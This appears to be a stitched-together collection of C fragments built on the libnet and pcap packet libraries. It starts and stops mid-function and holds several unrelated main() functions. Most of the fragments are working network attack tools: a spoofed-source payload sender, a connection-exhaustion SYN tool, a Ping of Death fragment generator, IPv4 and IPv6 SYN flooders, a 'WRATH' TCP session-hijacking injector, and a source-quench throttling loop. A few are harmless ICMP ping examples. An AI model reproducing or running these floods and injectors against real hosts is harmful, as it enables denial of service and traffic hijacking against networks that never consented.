if( (nsf = fopen(nsfn, "r")) == NULL) {
fprintf(stderr, "Error opening file %s \n", nsfn);
exit(1);
} /* end if */
if( (srcf = fopen(srcfn, "r")) == NULL) {
fprintf(stderr, "Error opening file %s \n", srcfn);
exit(1);
} /* end if */
printf("Reading key words ...\n");
while ((jd < MAXLINES) && (fgets(lb, 80, dmf)!=0) ) {
kd = 0;
kn = 0;
while (lb[kd] != '\0') { /* get rid of space and CR */
linebuf[kn++] = lb[kd++];
} /* end while */
linebuf[kn] = '\0';
paybuf = linebuf;
if (kn != 0) { /* not empty line */
/* convert line into http query payload */
dms[jd] = (char *)malloc(strlen(paybuf)+1); /* alloc mem */
strcpy(dms[jd], paybuf);
pay_s[jd] = strlen(dms[jd]);
/* ===== for message body debugging */
for (kn=0; kn < pay_s[jd]; kn++) {
bt = *(dms[jd] + kn);
printf(" %02X", bt);
}
printf("\n");
/*=== */
jd++;
} /* end if */
} /* end while */
printf("Total http requests: %d\n", jd);
fclose(dmf);
js=0;
printf("Reading spoofed source IPs ... \n");
while ((js < MAXLINES) && (fgets(lb, 80, srcf)!=0) ) {
kd = 0;
kn = 0;
while (lb[kd] != '\0') { /* get rid of space and CR */
if ((lb[kd] != ' ') && (lb[kd] != '\n')) {
linebuf[kn] = lb[kd];
kn++;
} /* end if */
kd++;
} /* end while */
linebuf[kn] = '\0';
if (kn != 0) { /* not empty line */
srcs[js] = (char *)malloc(strlen(linebuf)+1);
strcpy(srcs[js++], linebuf);
/* printf("%s\n", srcs[js-1]); */
} /* end if */
} /* end while */
printf("Total source IPs: %d\n", js);
fclose(srcf);
jn = 0;
printf("Reading dst IPs ... \n");
while ((jn < MAXLINES) && (fgets(lb, 80, nsf)!=0) ) {
kd = 0;
kn = 0;
while (lb[kd] != '\0') { /* get rid of space and CR */
if ((lb[kd] != ' ') && (lb[kd] != '\n')) {
linebuf[kn] = lb[kd];
kn++;
} /* end if */
kd++;
} /* end while */
linebuf[kn] = '\0';
if (kn != 0) { /* not empty line */
nss[jn] = (char *)malloc(strlen(linebuf)+1);
strcpy(nss[jn++], linebuf);
/* printf("%s\n", nss[jn-1]); */
} /* end if */
} /* end while */
printf("Total dst IPs: %d\n", jn);
fclose(nsf);
nround = 0;
/* while(1) { non-stop sending ... */
/* Initialize the library. Root priviledges are required. */
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* errbuf */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
libnet_seed_prand(l);
tcp = 0;
ip = 0;
for(kd=0; kd < jd; kd++) { /* loop over all http reqs */
for(kn=0; kn < jn; kn++) { /* loop over all dst IPs */
if ((dst_ip = libnet_name2addr4(l, nss[kn], LIBNET_RESOLVE)) == -1) {
fprintf(stderr, "Bad dest IP address: %s\n", nss[kn]);
exit(EXIT_FAILURE);
} /* end if */
/* printf("feeding %s for keyword %s ...\n", nss[kn], dms[kd]); */
i = (int)(libnet_get_prand(LIBNET_PRu16)/65535.0*(js-1)); /* Randsrc ip */
src_ip = libnet_name2addr4(l, srcs[i], LIBNET_RESOLVE); /* src ip */
printf("using source IP %s ...\n", srcs[i]);
src_prt = libnet_get_prand(LIBNET_PRu16); /* Random source port */
dst_prt = 1234; /* http */
/* Building TCP */
tcp = libnet_build_tcp(
src_prt, /* source port */
dst_prt, /* destination port */
libnet_get_prand(LIBNET_PRu32),
libnet_get_prand(LIBNET_PRu32),
0x18, /* (PSH, ACK) */
libnet_get_prand(LIBNET_PRu16), /* window size */
0, /* checksum */
0, /* urgent pointer */
LIBNET_TCP_H + pay_s[kd], /* packet length */
dms[kd], /* payload */
pay_s[kd], /* payload size */
l, /* libnet handle */
tcp); /* libnet id */
if (tcp == -1) {
fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
goto bad;
}
/* Building IP */
ip = libnet_build_ipv4(
LIBNET_IPV4_H + pay_s[kd] + LIBNET_TCP_H, /* length */
0x00, /* TOS */
0, /* IP ID */
0x4000, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip,
dst_ip,
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
ip); /* libnet id */
if (ip == -1) {
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
/* Write it to the wire. */
c = libnet_write(l);
if (c == -1) {
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
} else {
/* printf("Wrote %d byte TCP packet; check the wire.\n", c); */
}
usleep(20); /* slow down to conserve bandwidth */
} /* end for */
} /* end for */
libnet_stats(l, &ls);
fprintf(stderr, "Packets sent: %ld\n"
"Packet errors: %ld\n"
"Bytes written: %ld\n",
ls.packets_sent, ls.packet_errors, ls.bytes_written);
libnet_destroy(l);
nround++;
printf("====== Round %ld sent ================\n", nround);
/* } end of while loop */
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
int
main(int argc, char *argv[])
{
pkt_t *dp = NULL;
int ch = 0;
u_int32_t count = 5;
u_int32_t group = 0; /* number of packets to send in group */
useconds_t usec = 0; /* rate limit number of SYN's sent */
pid_t pid = 0;
/* pcap */
pcap_t *p = NULL;
char *dev = NULL;
char errbuf[PCAP_ERRBUF_SIZE];
u_int32_t localnet = 0;
u_int32_t netmask = 0;
struct bpf_program fcode;
char *filt = NULL;
/* libnet */
char lerrbuf[LIBNET_ERRBUF_SIZE];
(void)memset(errbuf, 0, PCAP_ERRBUF_SIZE);
(void)memset(lerrbuf, 0, LIBNET_ERRBUF_SIZE);
ISNULL(filt = (char *)calloc(MAXFILT, 1));
ISNULL(dp = (pkt_t *)calloc(1, sizeof(pkt_t)));
dp->p_tcp = LIBNET_PTAG_INITIALIZER;
dp->p_ip = LIBNET_PTAG_INITIALIZER;
dp->winsize = TCP_WINSIZE;
dp->opts |= O_CHKISN; /* check the ISN return in the ACK by default */
drench_exit = 0; /* global, signal exit from loop */
while ( (ch = getopt(argc, argv, "ACc:d:hi:p:P:Rr:s:S:x:")) != EOF) {
switch (ch) {
case 'A': /* Continue ACK'ing all ACK's */
dp->opts |= O_ACK;
break;
case 'C': /* Don't check the returned sequence number in the ACK */
dp->opts ^= O_CHKISN;
break;
case 'c': /* Number of packets to send */
count = (u_int32_t)atoi(optarg);
break;
case 'd': /* Destination address */
dp->daddr = optarg;
break;
case 'h': /* Help */
usage();
break;
case 'i': /* Use interface */
dev = optarg;
break;
case 'p': /* Destination port */
dp->dport = (in_port_t)atoi(optarg);
break;
case 'P':
dp->payload = optarg; /* Send data with the ACK */
break;
case 'r': /* Range of ip's to allocate */
dp->range = (u_int8_t)atoi(optarg);
break;
case 'R': /* Repeat the scan */
dp->opts |= O_REPEAT;
break;
case 's': /* Source address */
dp->saddr = strdup(optarg);
break;
case 'S': /* Sleep (microseconds) */
usec = (useconds_t)atoi(optarg);
break;
case 'x': /* Number of packets to send in group */
group = (u_int32_t)atoi(optarg);
break;
default:
usage();
break;
}
}
if (dp->daddr == NULL) {
(void)fprintf(stderr, "Must specify destination address.\n");
usage();
}
if (dp->dport == 0) {
(void)fprintf(stderr, "Must specify destination port.\n");
usage();
}
if (dp->range == 0)
dp->range = 1;
if (group == 0)
group = dp->range;
if (dev == NULL)
PCAP_ERRBUF(dev = pcap_lookupdev(errbuf));
/* libnet */
dp->l = libnet_init(LIBNET_RAW4, dev, lerrbuf);
if (dp->l == NULL)
errx(EXIT_FAILURE, "libnet_init: %s", lerrbuf);
if (dp->saddr == NULL) {
u_int32_t ipaddr = 0;
/* Assign the inital address. */
/* FIXME Simplisitically assign the address from
* FIXME our current address. Note this breaks for many
* FIXME conditions: if the host is multi-homed, if
* FIXME another host exists on the network with that IP,
* FIXME if the final octet rolls past 254, if the network
* FIXME is classless, IP aliases ...
*
* FIXME We can check for these conditions (check the ARP
* FIXME table, etc), but it is error prone. So just
* FIXME warn the user and hope for the best.
*/
if ( (ipaddr = libnet_get_ipaddr4(dp->l)) == -1)
errx(EXIT_FAILURE, "%s", libnet_geterror(dp->l));
dp->saddr = strdup(libnet_addr2name4(ipaddr, LIBNET_DONT_RESOLVE));
(void)fprintf(stdout, "[%s] WARNING: Source address not assigned.\n", __progname);
}
if (dp->range > 1) {
(void)fprintf(stdout, "[%s] WARNING: Assigning addresses sequentially from %s.\n", __progname,
dp->saddr);
(void)fprintf(stdout, "[%s] WARNING: This may cause problems on your network if addresses conflict with other hosts!\n", __progname);
}
LIBNET_ERR(libnet_seed_prand(dp->l));
dp->secret = libnet_get_prand(LIBNET_PRu32);
/* pcap */
(void)fprintf(stdout, "[%s] Connection exhaustion started.\n", __progname);
(void)fprintf(stdout, "[%s] Using device: %s\n", __progname, dev);
(void)snprintf(filt, MAXFILT, PCAP_FILT, dp->daddr, dp->dport);
(void)fprintf(stdout, "[%s] Using filter: %s\n", __progname, filt);
PCAP_ERRBUF(p = pcap_open_live(dev, SNAPLEN, PROMISC, TIMEOUT, errbuf));
if (pcap_lookupnet(dev, &localnet, &netmask, errbuf) == -1)
errx(EXIT_FAILURE, "%s\n", errbuf);
PCAP_ERR(pcap_compile(p, &fcode, filt, 1 /* optimize == true */, netmask));
PCAP_ERR(pcap_setfilter(p, &fcode));
switch (pcap_datalink(p)) {
case DLT_IEEE802_11:
(void)fprintf(stderr, "[%s] Link layer is 802.11\n", __progname);
break;
case DLT_EN10MB:
(void)fprintf(stderr, "[%s] Link layer is ethernet\n", __progname);
break;
default:
(void)fprintf(stderr, "[%s] Link layer is unsupported\n", __progname);
break;
}
if (create_arp_pool1(dp) < 0)
warnx("Could not create ARP pool");
(void)signal(SIGHUP, drench_cleanup);
(void)signal(SIGQUIT, drench_cleanup);
(void)signal(SIGINT, drench_cleanup);
(void)signal(SIGTERM, drench_cleanup);
if ( (pid = fork()) == -1)
err(EXIT_FAILURE, "fork");
/* begin by sending SYN packets */
if (pid == 0)
drench_writer(dp, count, group, usec);
drench_reader(dp, p);
(void)destroy_arp_pool1(dp);
libnet_destroy(dp->l);
free(dp->saddr);
free(dp);
exit (EXIT_FAILURE);
}
int
main(int argc, char **argv)
{
libnet_t *l;
libnet_ptag_t ip;
libnet_ptag_t icmp;
struct libnet_stats ls;
u_long fakesrc, target;
u_char *data;
int c, i, flags, offset, len;
char errbuf[LIBNET_ERRBUF_SIZE];
printf("libnet 1.1 Ping of Death[raw]\n");
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* errbuf */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
if (argc != 2 || ((target = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE) == -1)))
{
fprintf(stderr, "Usage: %s <target>\n", argv[0]);
exit(EXIT_FAILURE);
}
/* get random src addr. */
libnet_seed_prand(l);
fakesrc = libnet_get_prand(LIBNET_PRu32);
data = malloc(FRAG_LEN);
for (i = 0 ; i < FRAG_LEN ; i++)
{
/* fill it with something */
data[i] = 0x3a;
}
ip = LIBNET_PTAG_INITIALIZER;
icmp = LIBNET_PTAG_INITIALIZER;
for (i = 0 ; i < 65536 ; i += (LIBNET_ICMPV4_ECHO_H + FRAG_LEN))
{
offset = i;
flags = 0;
if (offset < 65120)
{
flags = IP_MF;
len = FRAG_LEN;
}
else
{
/* for a total reconstructed length of 65538 bytes */
len = 410;
}
icmp = libnet_build_icmpv4_echo(
ICMP_ECHO, /* type */
0, /* code */
0, /* checksum */
666, /* id */
666, /* sequence */
data, /* payload */
len, /* payload size */
l, /* libnet handle */
icmp); /* libnet ptag */
if (icmp == -1)
{
fprintf(stderr, "Can't build ICMP header: %s\n", libnet_geterror(l));
goto bad;
}
/* no reason to do this */
libnet_toggle_checksum(l, icmp, 0);
ip = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H + len, /* length */
0, /* TOS */
666, /* IP ID */
flags | (offset >> 3), /* IP Frag */
64, /* TTL */
IPPROTO_ICMP, /* protocol */
0, /* checksum */
fakesrc, /* source IP */
target, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
ip); /* libnet ptag */
if (ip == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
}
/* tcpdump-style jonks. */
printf("%s > %s: (frag 666:%d@%d%s)\n", libnet_addr2name4(fakesrc,0),
argv[1], LIBNET_ICMPV4_ECHO_H + len, offset, flags ? "+" : "");
}
libnet_stats(l, &ls);
fprintf(stderr, "Packets sent: %lld\n"
"Packet errors: %lld\n"
"Bytes written: %lld\n",
ls.packets_sent, ls.packet_errors, ls.bytes_written);
libnet_destroy(l);
free(data);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
free(data);
return (EXIT_FAILURE);
}
int main() {
libnet_t *l; /* libnet context */
char errbuf[LIBNET_ERRBUF_SIZE], ip_addr_str[16];
u_int32_t ip_addr;
libnet_ptag_t icmp_tag, ip_tag;
u_int16_t id, seq;
int i;
l = libnet_init(LIBNET_RAW4, NULL, errbuf);
if ( l == NULL ) {
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
icmp_tag = ip_tag = LIBNET_PTAG_INITIALIZER;
/* Generating a random id */
libnet_seed_prand(l);
id = (u_int16_t)libnet_get_prand(LIBNET_PR16);
/* Getting destination IP address */
printf("Destination IP address: ");
scanf("%15s",ip_addr_str);
ip_addr = libnet_name2addr4(l, ip_addr_str, LIBNET_DONT_RESOLVE);
if ( ip_addr == -1 ) {
fprintf(stderr, "Error converting IP address.\n");
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Building ICMP header */
seq = 1;
icmp_tag = libnet_build_icmpv4_echo(ICMP_ECHO, 0, 0, id, seq, NULL,\
0, l, 0);
if (icmp_tag == -1) {
fprintf(stderr, "Error building ICMP header: %s\n",\
libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Building IP header */
ip_tag = libnet_autobuild_ipv4(LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H,\
IPPROTO_ICMP, ip_addr, l);
if (ip_tag == -1) {
fprintf(stderr, "Error building IP header: %s\n",\
libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Writing 4 packets */
for ( i = 0; i < 4; i++ ) {
/* Updating the ICMP header */
icmp_tag = libnet_build_icmpv4_echo(ICMP_ECHO, 0, 0, id,\
(seq + i), NULL, 0, l, icmp_tag);
if (icmp_tag == -1) {
fprintf(stderr, "Error building ICMP header: %s\n",\
libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
if ( libnet_write(l) == -1 )
fprintf(stderr, "Error writing packet: %s\n",\
libnet_geterror(l));
/* Waiting 1 second between each packet */
sleep(1);
}
libnet_destroy(l);
return 0;
}
int main(int argc, char *argv[]) {
libnet_t *libnet_context;
u_long dest_ip;
u_short dest_port;
u_char errbuf[LIBNET_ERRBUF_SIZE];
int opt, byte_count, packet_size = LIBNET_IPV4_H + LIBNET_TCP_H;
if(argc < 3)
{
printf("Usage:\n%s\t <target host> <target port>\n", argv[0]);
exit(1);
}
libnet_context = libnet_init(LIBNET_RAW4, NULL, errbuf); // Init libnet context
if ( libnet_context == NULL )
{
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
dest_ip = libnet_name2addr4(libnet_context, argv[1], LIBNET_RESOLVE); // the host
dest_port = (u_short) atoi(argv[2]); // the port
libnet_seed_prand(libnet_context); // seed the random number generator
printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip));
while(1) // loop forever (until break by CTRL-C)
{
libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // source TCP port (random)
dest_port, // destination TCP port
libnet_get_prand(LIBNET_PRu32), // sequence number (randomized)
libnet_get_prand(LIBNET_PRu32), // acknowledgement number (randomized)
TH_SYN, // control flags (SYN flag set only)
libnet_get_prand(LIBNET_PRu16), // window size (randomized)
0, // checksum (0 autofill)
0, // urgent pointer
LIBNET_TCP_H, // tcp packet length
NULL, // payload (none)
0, // payload length
libnet_context, // context
0); // ptag
libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H, // size of the packet sans IP header
IPTOS_LOWDELAY, // IP tos
libnet_get_prand(LIBNET_PRu16), // IP ID (randomized)
0, // frag stuff
libnet_get_prand(LIBNET_PR8), // TTL (randomized)
IPPROTO_TCP, // transport protocol
0, // checksum
libnet_get_prand(LIBNET_PRu32), // source IP (randomized)
dest_ip, // destination IP
NULL, // payload (none)
0, // payload length
libnet_context, // libnet context
0); // ptag
byte_count = libnet_write(libnet_context); // inject packet
if ( byte_count != -1 )
printf("%d bytes written.\n", byte_count);
else
fprintf(stderr, "Error writing packet: %s\n",\
libnet_geterror(libnet_context));
libnet_clear_packet(libnet_context); // clear packet
usleep(FLOOD_DELAY); // wait for FLOOD_DELAY milliseconds
}
libnet_destroy(libnet_context); // free packet memory
return 0;
}
int
main(int argc, char **argv)
{
struct libnet_in6_addr dst_ip;
struct libnet_in6_addr src_ip;
u_short dst_prt = 0;
u_short src_prt = 0;
libnet_t *l;
libnet_ptag_t tcp, ip, ip_frag;
u_char *cp;
char errbuf[LIBNET_ERRBUF_SIZE];
int i, j, c, packet_amt, burst_int, burst_amt;
char srcname[100], dstname[100];
u_int8_t payload[56];
packet_amt = 0;
burst_int = 0;
burst_amt = 1;
tcp = ip_frag = ip = LIBNET_PTAG_INITIALIZER;
printf("libnet 1.1 syn flooding: TCP IPv6 fragments [raw]\n");
l = libnet_init(
LIBNET_RAW6, /* injection type */
NULL, /* network interface */
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
while((c = getopt(argc, argv, "t:a:i:b:")) != EOF)
{
switch (c)
{
case 't':
if (!(cp = strrchr(optarg, '/')))
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
*cp++ = 0;
dst_prt = (u_short)atoi(cp);
dst_ip = libnet_name2addr6(l, optarg, 1);
if (strncmp((char*)&dst_ip,
(char*)&in6addr_error,sizeof(in6addr_error))==0)
{
fprintf(stderr, "Bad IPv6 address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 'a':
packet_amt = atoi(optarg);
break;
case 'i':
burst_int = atoi(optarg);
break;
case 'b':
burst_amt = atoi(optarg);
break;
default:
usage(argv[0]);
exit(EXIT_FAILURE);
}
}
src_ip = libnet_name2addr6(l, "0:0:0:0:0:0:0:1", LIBNET_DONT_RESOLVE);
/* src_ip = libnet_name2addr6(l,
"3ffe:400:60:4d:250:fcff:fe2c:a9cd", LIBNET_DONT_RESOLVE);
dst_prt = 113;
dst_ip = libnet_name2addr6(l, "nathan.ip6.uni-ulm.de", LIBNET_RESOLVE);
packet_amt = 1;
*/
if (!dst_prt || strncmp((char*)&dst_ip,
(char*)&in6addr_error,sizeof(in6addr_error))==0 || !packet_amt)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
libnet_seed_prand(l);
libnet_addr2name6_r(src_ip, LIBNET_RESOLVE, srcname, sizeof(srcname));
libnet_addr2name6_r(dst_ip, LIBNET_RESOLVE, dstname, sizeof(dstname));
for(; burst_amt--;)
{
for (i = 0; i < packet_amt; i++)
{
for (j = 0; j < 56; j++) payload[j] = 'A' + ((char)(j % 26));
tcp = libnet_build_tcp(
src_prt = libnet_get_prand(LIBNET_PRu16),
dst_prt,
libnet_get_prand(LIBNET_PRu32),
libnet_get_prand(LIBNET_PRu32),
TH_SYN,
libnet_get_prand(LIBNET_PRu16),
0,
0,
LIBNET_TCP_H,
NULL,
0,
l,
tcp);
if (tcp == -1)
{
fprintf(stderr, "Can't build or modify TCP header: %s\n",
libnet_geterror(l));
return (EXIT_FAILURE);
}
ip_frag = libnet_build_ipv6_frag(
IPPROTO_TCP, /* next header */
0, /* reserved */
0, /* frag bits */
1, /* ip id */
NULL,
0,
l,
ip_frag);
if (ip_frag == -1)
{
fprintf(stderr, "Can't build or modify TCP header: %s\n",
libnet_geterror(l));
return (EXIT_FAILURE);
}
ip = libnet_build_ipv6(
0, 0,
LIBNET_TCP_H,
IPPROTO_TCP,
64,
src_ip,
dst_ip,
NULL,
0,
l,
ip);
if (ip == -1)
{
fprintf(stderr, "Can't build or modify TCP header: %s\n",
libnet_geterror(l));
return (EXIT_FAILURE);
}
printf("%15s/%5d -> %15s/%5d\n",
srcname,
ntohs(src_prt),
dstname,
dst_prt);
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "libnet_write: %s\n", libnet_geterror(l));
}
#if !(__WIN32__)
usleep(250);
#else
Sleep(250);
#endif
}
#if !(__WIN32__)
sleep(burst_int);
#else
Sleep(burst_int * 1000);
#endif
}
exit(EXIT_SUCCESS);
}
void wrath_observe() {
char libnet_errbuf[LIBNET_ERRBUF_SIZE];
char pcap_errbuf[PCAP_ERRBUF_SIZE];
char *device;
/* initializing bundle */
chp = (struct lcp_package *) malloc(sizeof (struct lcp_package));
memset(chp, 0x00, sizeof(struct lcp_package));
chp->cline_args = user_values;
/* initializing sniffer, getting into position */
pcap_handle = wrath_position(user_values);
/* grabbing device name for libnet */
if (strcmp(user_values->interface, "\0") == 0) { // if interface is not set
device = pcap_lookupdev(pcap_errbuf);
if(device == NULL) {
fprintf(stderr, "error fetching interface: %s %s\n", pcap_errbuf, "(this program must be run as root)");
exit(1);
}
} else { // if interface is set
device = user_values->interface;
}
// initializing environment for libent in advanced mode
libnet_handle = libnet_init(LIBNET_RAW4_ADV, device, libnet_errbuf);
if (libnet_handle == NULL) {
fprintf(stderr, "trouble initiating libnet interface: %s \n", libnet_errbuf);
exit(1);
}
chp->libnet_handle = libnet_handle;
// finding payload
int length;
char *app_cmd = "\0";
if (strcmp(user_values->input_file, "\0") != 0) { // If an input file has been specified
int app_fd;
app_fd = open(user_values->input_file, O_RDONLY, 0);
if ((length = file_size(app_fd)) == -1)
fatal_error("getting file size");
app_cmd = (char *) safe_malloc(length);
read(app_fd, app_cmd, length-1);
app_cmd[length-1] = '\0';
} else if (!strcmp(user_values->command, "\0") != 0) { // If a command has been specified but not an input file
length = strlen(user_values->command);
app_cmd = (unsigned char *) safe_malloc(length);
strcpy(app_cmd, user_values->command);
app_cmd[length-1] = '\0';
}
// finding and setting up logfile
if ((strcmp(user_values->logfile, "\0"))) {
fp = fopen(user_values->logfile, "w");
openned = 1;
chp->logfile = fp;
}
// converting and setting payload
char *app_cmd_con = (char *) malloc(strlen(app_cmd));
if (strcmp(app_cmd, "\0") != 0) { // if a payload was found
wrath_char_encode(app_cmd, app_cmd_con);
free(app_cmd);
chp->payload = app_cmd_con;
} else {
chp->payload = "\0";
}
printf("Starting WRATH ...\n");
printf("Hijacking specified packets with ... \n");
//printf("Payload:\n%s\n", chp->payload);
printf("-----BEGINNING-OF-PAYLOAD-----\n");
printf("%s",chp->payload);
printf("\n--------END-OF-PAYLOAD--------\n");
if (openned) {
fprintf(fp, "Starting WRATH ...\n");
fprintf(fp, "Hijacking specified packets with ... \n");
fprintf(fp, "Payload:\n%s\n", chp->payload);
fprintf(fp, "-----BEGINNING-OF-PAYLOAD-----\n");
fprintf(fp, chp->payload);
fprintf(fp, "\n--------END-OF-PAYLOAD--------\n");
}
// seeding psuedorandom number generator
libnet_seed_prand(libnet_handle);
int cap_amount = -1;
if (user_values->count != 0) // if count is set
cap_amount = user_values->count;
pcap_loop(pcap_handle, cap_amount, wrath_inject, (u_char *) chp);
pcap_close(pcap_handle);
// getting statistical information
struct libnet_stats l_stats;
libnet_stats(libnet_handle, &l_stats);
printf("Wrath Stats: \n");
printf("Packets Injected: %d\n", l_stats.packets_sent);
if (openned)
fclose(fp);
libnet_destroy(libnet_handle);
free(app_cmd_con);
free(chp);
}
int main(int argc, char *argv[])
{
int n;
char errbuf[LIBNET_ERRBUF_SIZE];
/* pcap variables */
char perrbuf[PCAP_ERRBUF_SIZE];
char *dev ="eth0"; /* default if */
char filter[MAXTEXT];
u_short sport; /* remote port from which syn-ack is coming */
struct bpf_program fp; /* hold compiled program */
bpf_u_int32 maskp; /* subnet mask */
bpf_u_int32 netp; /* ip */
void usage(char *);
/* Initialize the library. Root priviledges are required. */
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* errbuf */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
libnet_seed_prand(l);
tcp = 0;
ip = 0;
if (argc != 5) {
usage(argv[0]);
exit(EXIT_FAILURE);
}
while ((n = getopt(argc, argv, "p:i:")) != EOF)
{
switch (n)
{
case 'p':
sport = (u_short) atoi(optarg); /* local port */
break;
case 'i':
dev = optarg; /* device */
break;
default:
usage(argv[0]);
exit(EXIT_FAILURE);
}
}
pcap_lookupnet(dev,&netp,&maskp,perrbuf);
/* open device for reading in promiscuous mode */
descr = pcap_open_live(dev,BUFSIZ,1,-1,perrbuf);
if(descr == NULL)
{ printf("pcap_open_live(): %s\n",perrbuf); exit(1); }
/* Lets try and compile the program.. non-optimized */
sprintf(filter, "src port %d and tcp[13] == 18", sport); /* only SYN-ACK */
/* printf("The filter is: %s\n", filter); */
if(pcap_compile(descr,&fp,filter,0,netp) == -1)
{ fprintf(stderr,"Error calling pcap_compile\n"); exit(1); }
/* set the compiled program as the filter */
if(pcap_setfilter(descr,&fp) == -1)
{ fprintf(stderr,"Error setting filter\n"); exit(1); }
pcap_loop(descr,-1,my_callback,NULL);
pcap_close(descr);
libnet_destroy(l);
return (EXIT_SUCCESS);
}
void
tcp_nice_loop(pcap_t *pd, int sock)
{
struct pcap_pkthdr pkthdr;
struct libnet_ip_hdr *ip;
struct libnet_tcp_hdr *tcp;
struct libnet_icmp_hdr *icmp;
u_char *pkt, buf[IP_H + ICMP_ECHO_H + 128];
int len, nice;
libnet_seed_prand();
nice = 160 / Opt_nice;
for (;;) {
if ((pkt = (char *)pcap_next(pd, &pkthdr)) != NULL) {
ip = (struct libnet_ip_hdr *)(pkt + pcap_off);
if (ip->ip_p != IPPROTO_TCP) continue;
tcp = (struct libnet_tcp_hdr *)
((u_char *)ip + (ip->ip_hl * 4));
if (tcp->th_flags & (TH_SYN|TH_FIN|TH_RST) ||
ntohs(tcp->th_win) == nice)
continue;
if (Opt_icmp) {
/* Send ICMP source quench. */
len = (ip->ip_hl * 4) + 8;
libnet_build_ip(ICMP_ECHO_H + len, 0,
libnet_get_prand(PRu16),
0, 64, IPPROTO_ICMP,
ip->ip_dst.s_addr,
ip->ip_src.s_addr,
NULL, 0, buf);
icmp = (struct libnet_icmp_hdr *)(buf + IP_H);
icmp->icmp_type = 4;
icmp->icmp_code = 0;
memcpy((u_char *)icmp + ICMP_ECHO_H,
(u_char *)ip, len);
libnet_do_checksum(buf, IPPROTO_ICMP,
ICMP_ECHO_H + len);
len += (IP_H + ICMP_ECHO_H);
if (libnet_write_ip(sock, buf, len) != len)
warn("write");
fprintf(stderr, "%s > %s: icmp: source quench\n",
libnet_host_lookup(ip->ip_dst.s_addr, 0),
libnet_host_lookup(ip->ip_src.s_addr, 0));
}
/* Send tiny window advertisement. */
ip->ip_hl = 5;
ip->ip_len = htons(IP_H + TCP_H);
ip->ip_id = libnet_get_prand(PRu16);
memcpy(buf, (u_char *)ip, IP_H);
tcp->th_off = 5;
tcp->th_win = htons(nice);
memcpy(buf + IP_H, (u_char *)tcp, TCP_H);
libnet_do_checksum(buf, IPPROTO_TCP, TCP_H);
len = IP_H + TCP_H;
if (libnet_write_ip(sock, buf, len) != len)
warn("write");
fprintf(stderr, "%s:%d > %s:%d: . ack %u win %d\n",
libnet_host_lookup(ip->ip_src.s_addr, 0),
ntohs(tcp->th_sport),
libnet_host_lookup(ip->ip_dst.s_addr, 0),
ntohs(tcp->th_dport),
ntohl(tcp->th_ack), nice);
}
}
}
int main()
{
libnet_t *handle;
char errbuf[LIBNET_ERRBUF_SIZE],ip_addr_str[16];
u_int32_t ip_addr;
u_int16_t id,seq;
char payload[] = "libnet :D";
int bytes_written;
handle = libnet_init(LIBNET_RAW4,NULL,errbuf);
if(handle == NULL)
{
fprintf(stderr,"libnet_init() failed: %s\n",errbuf);
exit(EXIT_FAILURE);
}
libnet_seed_prand(handle);
id = (u_int16_t)libnet_get_prand(LIBNET_PR16);
printf("Destination IP address: ");
scanf("%15s",ip_addr_str);
ip_addr = libnet_name2addr4(handle,ip_addr_str,LIBNET_DONT_RESOLVE);
if(ip_addr == -1)
{
fprintf(stderr,"Error converting IP address.\n");
libnet_destroy(handle);
exit(EXIT_FAILURE);
}
seq = 1;
if(libnet_build_icmpv4_echo(ICMP_ECHO,0,0,id,seq,\
(u_int8_t *)payload,sizeof(payload),handle,0)==-1)
{
fprintf(stderr,"Error building ICMP header: %s\n",\
libnet_geterror(handle));
libnet_destroy(handle);
exit(EXIT_FAILURE);
}
if(libnet_autobuild_ipv4(LIBNET_IPV4_H + \
LIBNET_ICMPV4_ECHO_H + sizeof(payload),\
IPPROTO_ICMP,ip_addr,handle) == -1)
{
fprintf(stderr,"Error building IP header: %s\n",\
libnet_geterror(handle));
libnet_destroy(handle);
exit(EXIT_FAILURE);
}
bytes_written = libnet_write(handle);
if(bytes_written != -1)
printf("%d bytes written.\n",bytes_written);
else
fprintf(stderr,"Error writing packet: %s\n",\
libnet_geterror(handle));
libnet_destroy(handle);
return 0;
}
int main() {
libnet_t *l; /* libnet context */
char errbuf[LIBNET_ERRBUF_SIZE], ip_addr_str[16];
